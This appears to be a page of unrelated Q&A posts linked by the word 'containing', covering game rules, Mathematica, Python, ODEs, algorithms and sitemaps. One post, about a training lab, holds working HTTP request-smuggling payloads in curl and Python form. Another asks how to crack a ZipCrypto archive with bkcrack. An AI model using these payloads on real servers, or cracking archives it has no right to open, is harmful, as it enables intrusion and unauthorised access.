## Change Shape: what happens if you try to meld an item containing a creature?

So fun question that came up in another one of my games.

A player (me) is currently an adult gold dragon via True Polymorph; duration is currently "until dispelled".

The Change Shape ability says that items being worn/carried can be chosen to meld into the new form. Now if I am carrying a coffin with a living creature in it, what happens to the creature if I try and meld the coffin into me?

The creature in question is alive but is in no way concious or able to object in anyway.

A ruling in the case of a normal coffin and another with a magically closed coffin would be greatly appreciated.

## How to remove any words containing two adjacent characters with different cases?

I have a list of permutations of ABCabc and I want to remove any permutations with two adjacent characters with different cases (uppercase and lowercase).

For example,

• ABCcab is kept.
• ABCacb must be removed because Ca contains two adjacent characters with different cases.
• AbBcaC must be removed as well.

# Attempt

Here is my attempt but without filtering.

Select[StringJoin /@ Permutations[Characters@"ABCabc"],....] 

## What is the theoretical result of flattening a list containing only itself?

Consider the following python code

X = [None] X[0] = X 

This has many fun properties such as

X[0] == X 

and

X[0][0][0][0][0][0][0][0] == X 

I understand how this works from a practical standpoint, as it’s all just the same pointer.

Now, when flattening a list, we tend to convert things from

[[1, 2, 3], [[4, 5], [6, 7]], 8, 9] 

to

[1, 2, 3, 4, 5, 6, 7, 8, 9] 

In this case, I am considering flattening to be reducing a multi-dimensional list down to a single list of only non-list elements.

In practice, flattening this list would be impossible, as it would create an infinite loop.

This may be more mathematical in nature, but I’m unsure how to put it in mathematical terms. Suppose we could flatten this list, would the result simply be the empty list?

For context, I initially got this idea by considering the list

X = [[], []] X[0] = X 

It is clear to see that at each pass of flattening, the empty list that is the second element simply disappears. This lead me to think that the overall result, may be the empty list.

Could it be possible that flattening this list would theoretically produce an infinitely long list of the list itself, as in

X == [X, X, X, X, X, X, ..., X] 

This is purely a fun thought exercise. Any insight and discussion on this would be appreciated.

P.S. Although I’m looking for an answer in plain terms, if anyone is more mathematically inclined, I would be interested to see how this problem could be formulated in some sort of set notation. Please feel free to point me to a relevant math exchange thread as well.

P.P.S. I would also be interested in a solid proof (not formal) to go along with the answer.

## Approximate solution of a nonlinear ODE in the form of a Fourier series containing the coefficients of the initial ODE

In this topic we considering nonlinear ODE:

$$\frac{dx}{dt}= (x^4) \cdot a_1 \cdot sin(\omega_1 \cdot t)-a_1 \cdot sin(\omega_1 \cdot t + \frac{\pi}{2})$$ – Chini ODE

And system of nonlinears ODE:

$$\frac{dx}{dt}= (x^4+y^4) \cdot a_1 \cdot sin(\omega_1 \cdot t)-a_1 \cdot sin(\omega_1 \cdot t + \frac{\pi}{2})$$

$$\frac{dy}{dt}= (x^4+y^4) \cdot a_2 \cdot sin(\omega_2 \cdot t)-a_2 \cdot sin(\omega_2 \cdot t + \frac{\pi}{2})$$

Chini ODE’s NDSolve in Mathematica:

pars = {a1 = 0.25, \[Omega]1 = 1} sol1 = NDSolve[{x'[t] == (x[t]^4) a1 Sin[\[Omega]1 t] - a1 Cos[\[Omega]1 t], x[0] == 1}, {x}, {t, 0, 200}] Plot[Evaluate[x[t] /. sol1], {t, 0, 200}, PlotRange -> Full] 

System of Chini ODE’s NDSolve in Mathematica:

pars = {a1 = 0.25, \[Omega]1 = 3, a2 = 0.2, \[Omega]2 = 4} sol2 = NDSolve[{x'[t] == (x[t]^4 + y[t]^4) a1 Sin[\[Omega]1 t] - a1 Cos[\[Omega]1 t], y'[t] == (x[t]^4 + y[t]^4) a2 Sin[\[Omega]2 t] - a2 Cos[\[Omega]2 t], x[0] == 1, y[0] == -1}, {x, y}, {t, 0, 250}] Plot[Evaluate[{x[t], y[t]} /. sol2], {t, 0, 250}, PlotRange -> Full] 

There is no exact solution to these equations, therefore, the task is to obtain an approximate solution.

Using AsymptoticDSolveValue was ineffective, because the solution is not expanded anywhere except point 0.

The numerical solution contains a strong periodic component; moreover, it is necessary to evaluate the oscillation parameters. Earlier, we solved this problem with some users as numerically: Estimation of parameters of limit cycles for systems of high-order differential equations (n> = 3)

How to approximate the solution of the equation by the Fourier series so that it contains the parameters of the original differential equation in symbolic form, namely $$a_1$$, $$\omega_1$$, $$a_2$$ and $$\omega_2$$.

## Delete rows or columns of matrix containing invalid elements, such that a maximum number of valid elements is kept

Originally posted in stack-overflow but was told to post here.

Context: I am doing a PCA on a MxN (N >> M) matrix with some invalid values located in the matrix. I cannot infer these values, so I need to remove all of them, which means I need to delete the whole corresponding row or column. Of course I want to keep the maximum amount of data. The invalid entries represent ~30% of data, but most of it is completly fill in a few lines, few of it is scattered in the rest of the matrix.

Some possible approches:

• Similar to this problem , where I format my matrix such that valid data entries are equal to 1 and invalid entries to a huge negative number. However, all proposed solutions are of exponential complexity and my problem is simpler.

• Computing the ratio (invalid data / valid data) for each row or column, and deleting the highest ratio(s). Recompute the ratios for the sub-matrix and remove the highest(s) ratios. (not sure how many lines or columns we can remove safely in one step), and so on until there is no invalid data left. It seems like an okay solution, but I am unsure it always gives the optimal solution.

My guess is that it is a standard data analysis problem, but surprisingly I could not find a solution online.

## Sitemap: Should I dynamically update sitemap for dynamic content or create a page containing all the dynamic links

Say i have the following route http://<my-domain>/{category}/subjects/{id}/Sitemap: Should I dynamically update sitemap for dynamic content or create a page containing all the dynamic links

the ones in the brackets are dynamic, I’m struggling with what is better or any better way to let google crawl through all these dynamic links

Approach 1: manually doing the job by removing or adding the record to site map and updating <lastmod>

Approach 2: create a page that includes all those links and reference that page in sitemap.xml

The second approach can be generated as a plain html file which is generated from the server app. Or, a simple webform aspx page that dynamically generates those links without having to create an html file.

## Choose $n$ out of $2n-1$ boxes containing at least half of all white balls and half of all black balls

We are given $$2n – 1$$ boxes with black and white balls. In the $$i$$-th, box there are $$w_i$$ white and $$b_i$$ black balls. It is required to choose $$n$$ boxes so that, the sum of the white balls is at least $$W/2$$, and the sum of black balls is at least $$B/2$$. Solve for $$O(n\log{n})$$.

What I am currently thinking is this:

Generate some hashtable to be able to track the boxes that we chose.
Sort the boxes by the quantity of the white (in increasing order) balls and chose the last $$n$$ balls every time keeping them in our hashtable.
Sort by the quantity of the black balls and do the same. Check every time to see if we already chose the box or not. Here comes the problem: Suppose we didn’t. Then we can face a situation where we already have $$n$$ boxes that have in total at least $$W/2$$ white balls but at the same time, they have in total less than $$B/2$$ black balls. How can we overcome this problem?

We can’t just switch the chosen boxes that have the least number of white balls with the one that have the maximum available number of black balls since the box with white balls can contain significant amount of black balls on its own.

## Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1 Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 10 Transfer-Encoding: chunked  0  G  

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $'POST' \ -H$  'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H$  'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H$  'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H$  'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H$  'Content-Length: 8' \     --data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \$  'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/' 

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():     url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'     headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',     'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}      data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'      s = requests.Session()     r = requests.Request('POST', url, headers=headers, data=data)     prepared = r.prepare()     response = s.send(prepared)      print(response.request.headers)     print(response.status_code)     print(response.text) 

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python  import pycurl from StringIO import StringIO  buffer = StringIO() c = pycurl.Curl() c.setopt(c.POST, 1) c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/') c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a') #c.setopt(pycurl.POSTFIELDSIZE, 8) c.setopt(c.HTTPHEADER, [     'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',     'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',     'Content-Length: 8',     'Transfer-Encoding: chunked',     'Content-Type: application/x-www-form-urlencoded'     ]) #c.setopt(c.CRLF, 1) c.setopt(c.VERBOSE, 1) c.setopt(c.HEADER, 1) c.setopt(c.WRITEDATA, buffer) c.perform() c.close()  body = buffer.getvalue()  print(body) 

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying 18.200.141.238:443...                                                                                                                             * TCP_NODELAY set                                                                                                                                            * Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                      * found 387 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 *        server certificate verification OK *        server certificate status verification SKIPPED *        common name: web-security-academy.net (matched) *        server certificate expiration date OK *        server certificate activation date OK *        certificate public key: RSA *        certificate version: #3 *        subject: CN=web-security-academy.net *        start date: Fri, 05 Jul 2019 00:00:00 GMT *        expire date: Wed, 05 Aug 2020 12:00:00 GMT *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon * ALPN, server did not agree to a protocol > POST / HTTP/1.1 Host: ac561fd21ed819768081009200f2002e.web-security-academy.net Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0  Content-Length: 8 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded  8 * upload completely sent off: 15 out of 8 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 Internal Server Error < Content-Type: application/json; charset=utf-8 < Connection: close < Content-Length: 23 <  * Closing connection 0 HTTP/1.1 500 Internal Server Error Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 23  "Internal Server Error" 

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

## Recovery of files from a zip containing a directory (unencrypted) and 3 files (encrypred – ZipCrypto Deflate), possibe use of bkcrack?

I have a zip file, Example.zip consisting of a directory Example and three files *.dat. I can see the names of all 3 files. The dat files are encrypted (ZipCrypto Deflate). I’m interested to know if I can use bkcrack, and am aware of the required:

at least 12 bytes of contiguous plaintext.

My system has a modern 6c/12t CPU, and an older GPU.

1. Can I use anything about the directory or filenames themselves for the required plaintext?
2. If 1 is not possible what hints/course of action can I take to derive the 12 (or more) bytes.

I just need the files.

## Number of double wedges containing a point

We have a set of $$n$$ double wedges on a plane. (By double wedge, I mean two lines intersecting at a point, with opposite sides of the point considered as “inside” the double wedge.) Now these $$n$$ double wedges can intersect each other.

Our query is as follows: given a point, we want to find how many double wedges it’s contained in. We want to be able to make this query in $$O(\log n)$$ time, using a data structure that can be constructed (preprocessed) in $$O(n^2\log n)$$ time and $$O(n^2)$$ space.

This exercise is from the de Berg’s computational geometry book in the chapter about arrangement of lines, so I was thinking we can do some kind of incremental construction by adding the double wedges one by one, but I can’t seem to think of the data structure.